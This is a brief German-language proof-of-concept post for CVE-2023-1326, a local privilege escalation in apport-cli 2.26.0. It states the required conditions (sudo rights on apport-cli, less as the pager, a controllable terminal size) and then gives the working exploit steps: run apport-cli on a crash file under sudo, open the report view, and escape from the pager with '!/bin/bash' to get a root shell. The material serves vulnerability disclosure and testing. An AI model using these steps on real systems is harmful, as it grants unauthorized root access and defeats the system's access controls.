
Ein Proof of Concept für CVE-2023–1326 in apport-cli 2.26.0
Diese Schwachstelle ist eine Privilegieneskalation in apport-cli 2.26.0, ähnlich wie CVE-2023–26604. Diese Schwachstelle funktioniert nur, wenn sie in sudoers zugewiesen ist:

In apport-cli 2.26.0 und früheren Versionen wurde ein Privilegieneskalationsangriff gefunden, der CVE-2023-26604 ähnelt. Wenn ein System speziell so konfiguriert ist, dass unprivilegierte Benutzer sudo apport-cli ausführen dürfen, less als Pager konfiguriert ist und die Terminalgröße festgelegt werden kann, kann ein lokaler Angreifer Privilegien eskalieren.
sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash
press V (view report)
!/bin/bash
